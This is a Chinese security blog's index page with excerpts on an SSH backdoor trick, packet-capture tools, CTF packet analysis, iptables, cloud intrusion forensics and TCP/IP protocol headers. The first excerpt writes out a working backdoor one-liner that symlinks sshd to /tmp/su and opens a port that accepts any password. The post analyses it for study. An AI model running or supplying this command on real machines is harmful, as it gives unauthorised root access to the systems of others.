LOnils风迷 's Blog

网络尖刀核心成员
在鹅厂实习打杂 :),有机会再更新blog

hacking for fun

Copyright © LOnils/Hlly_M风迷's Blog

一条后门命令引发的思考 :)

某天尖刀群的 @Sevck's Blog 师傅发了在网上流传的这样一句后门

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555

命令的意思就是把sshd做个软连接新建到/tmp/su,之后开放5555端口。

之后ssh root@X.X.X.X -p 5555 即可连接,不过为何输入任意密码就能直接连接呢?

于是在vps上先tail -f /var/log/secure 下记录ssh的日志,之后执行ln后门,在这过程中发现如果把后门命令中...

分享两个抓包利器(NetworkMiner、QPA)

人比较懒,近一年没更新blog了。这次文章也是随手一写,分享两个不错的神器。

正常老司机们抓包都是tcpdump撸起后,拖到windows下拿wireshark做分析。

CTFer们做协议分析题也是直接拿wireshark用,拿filter的一些语法直接过滤关键数据及flow tcp steam 提取数据。

但是有时候在抓包过程中wireshark这种工具提取出文件特别麻烦,参照我之前写的那篇,手动拖个图要半天,以及想对一些软件进行专门的抓包可是一堆其他数据又乱入,用语法也过滤不了。。。。

直到发现了NetworkMiner和QPA这个两个工具。。。

NetworkMiner是开源的...

数据包分析for CTF

    没见过有人写过类似的文章,数据包分析还是比较有趣的,所以写了这篇总结,如果文章中有不对的地方请在下方留言讨论= =。

    下面所有的pcap文件都上传到网盘(http://pan.baidu.com/s/1qW5T9TE),大家可以下载做实验。

    如果你没做过题目那也可以先不看本文章,先自己做实验,会收获很多 :)

0x01 字符串提取


    这类题比较简单,直接搜索关键字...

iptables follow me

这是在学习iptables过程中的总结,分享出来希望对各位有用=。=

发到lofter格式有点废╮(╯_╰)╭。。文章已输出pdf:http://pan.baidu.com/s/1o6xBNKY

=============

Table of contents

0x01:包过滤技术

0x02:NAT

0x03:iptables/netfilter

0x04:iptables表、链、规则

0x05:iptables命令

0x06:配置实验

============

    在谈iptables之前,我们先来讲讲防火墙。这里我们不谈硬件防...

Black Hat Python-For Hackers and Pentesters

记得之前有过一个python逆向的,这次是渗透测试的了。


链接: http://pan.baidu.com/s/1i3imn7f

密码: gtiu


云安全入侵取证及思考

author:xti9er

    云计算平台是目前比较火的产业,腾讯也有面向企业和个人的公有云平台——腾讯云。笔者所在的腾讯安全中心也负责腾讯云的部分安全职责,因为工作关系,笔者也经常处理腾讯云上的安全事件。本文通过对腾讯云上的一次入侵取证分析实际案例,以小见大来窥探云计算平台(特别是公有云)的安全建设思路,希望对大家有帮助。

 

    某次接到系统报警某商户主机出现可疑文件,需配合调查。通过后台数据很快确认了问题,并结合其他取证手段捋清了整个事件。现已对腾讯云商户发布了安全预警。整个事件在技术...

0x06 DHCP协议分析

    DHCP(Dynamic Host Configuration Protocol,动态主机配置协议)是一个局域网网络协议,使用UDP协议工作,主要有两个用途:给内部网络或网络服务供应商自动分配IP地址,给用户或者内部网络管理员作为对所有计算机作中央管理的手段。


6.1 DHCP头


  • 操作代码OP :若是client送给server的封包,设为1,反向为2。

  • 硬件类别Htype:ethernet为1。

  • 硬件长度Hlen:ethernet为6。

  • 跳数Hops:若数据包需经过router传送,每站加

0x05 ICMP协议分析

    ICMP是(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议族的一个子协议,用于在IP主机路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。

5.1 ICMP头


  • 类型Type(8bit):标识生成的错误报文,它是ICMP报文中的第一个字段;
  • 代码 Code(8bit):进一步地限定生成ICMP报文。该字段用来查找产生错误的原因;
  • 校验和 Checksum(16bit):存储了ICMP所使用的校验和值。...

0x04 UDP协议分析

UDP 是User Datagram Protocol的简称, 中文名是用户数据报协议,是OSI中一种无连接的传输层协议,提供面向事务的简单不可靠信息传送服务

4.1 UDP头


  • 端口号 Source port(16bit): 传输数据包的端口。
  • 目标端口号 Destination port(16bit): 数据包到达的端口。
  • 数据报长度 Length(16bit):数据的字节长。
  • 校验值 Checksum (16bit): 确认UDP头及数据到达时的完整性。


UDP协议比较简单,因为它并不关心数据传输是否可靠...

0x03 TCP协议分析

    TCP,全称Transfer Control Protocol,中文名为传输控制协议,它工作在OSI的传输层,提供面向连接的可靠传输服务。

    TCP的工作主要是建立连接,然后从应用层程序中接收数据并进行传输。TCP采用虚电路连接方式进行工作,在发送数据前它需要在发送方和接收方建立一个连接,数据在发送出去后,发送方会等待接收方给出一个确认性的应答,否则发送方将认为此数据丢失,并重新发送此数据。


3.1 TCP头

TCP报头总长最小为20个字节


  • 源端口 Source...